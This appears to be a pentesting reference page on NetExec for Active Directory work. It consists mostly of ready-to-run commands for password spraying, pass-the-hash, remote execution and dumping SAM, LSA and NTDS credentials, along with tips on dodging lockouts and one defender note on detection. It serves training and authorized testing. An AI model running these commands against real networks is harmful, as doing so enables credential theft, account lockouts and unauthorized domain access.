Skip to content

NetExec (CME)

NetExec (the successor to CrackMapExec) is the Swiss army knife of Active Directory and Windows network pentesting. It automates enumeration and credential “spraying” across multiple hosts and protocols (SMB, WinRM, LDAP, MSSQL, RDP, SSH). Essential in the Windows & AD area (ad-*).

- validate credentials en masse across many hosts (where does this account work?)
- enumerate: shares, users, policies, sessions, group members
- execute commands, dump hashes/secrets, and a multitude of modules
- supports SMB, LDAP, WinRM, MSSQL, RDP, SSH, FTP, VNC...
nxc smb 10.10.10.0/24 # sweep: hosts, SMB signing, version
nxc smb host -u user -p pass # validate a credential
nxc smb host -u user -p pass --shares # enumerate shares
nxc smb 10.10.10.0/24 -u user -p pass # password spraying across the subnet
nxc smb host -u user -H <NThash> # pass-the-hash (see ad-creds)
nxc smb host -u u -p p --users / --groups / --sessions / --loggedon-users
nxc smb host -u u -p p --sam / --lsa / --ntds # dump credentials (see ad-creds)
nxc ldap host -u u -p p --bloodhound ... # collect for BloodHound (ad-bloodhound)
nxc smb host -u u -p p -x 'command' # execute a command
nxc winrm host -u u -p p -x 'whoami' # execution via WinRM
# try ONE password against MANY users (avoids lockouts) -> see ad-spray
nxc smb DC -u users.txt -p 'Spring2024!' --continue-on-success
# WATCH the lockout policy: bad spraying locks accounts (noise/DoS)
(Pwn3d!) NetExec marks this when the credential gives admin execution on the host
--local-auth local authentication (not domain)
# the output quickly summarizes on which hosts an account is admin -> an access map
  • NetExec maps fast where a credential works and where it’s admin (Pwn3d!) across the domain.
  • It integrates enumeration, spraying (Password Spraying), pass-the-hash (Credential Dumping), and dumping (NTDS/SAM/LSA).
  • Watch the lockout policy when spraying: done wrong, it locks accounts (DoS and noise).
  • For the defender: its activity (many 4625/4624, share access) is highly detectable (Detection & logging).
  • Start with --shares, --users, --pass-pol to enumerate before spraying; respect the lockout policy.
  • Common mistake: aggressive spraying that locks out domain accounts; 1 try per account and wait the window.
  • Use the right module and save the loot; --ntds only with domain admin; it flags the host with (Pwn3d!).
  • It supports protocols beyond SMB (WINRM, LDAP, MSSQL, SSH); pick the one that fits the target.
  • SMB sweep of the subnet (signing, versions, hosts)
  • Validate credentials and find (Pwn3d!) across the domain
  • Enumerate shares/users/groups/sessions
  • Password spraying respecting the lockout policy (Password Spraying)
  • Pass-the-hash where applicable (Credential Dumping)
  • Collection for BloodHound (BloodHound)
  • Credential dump with a privileged account (Credential Dumping)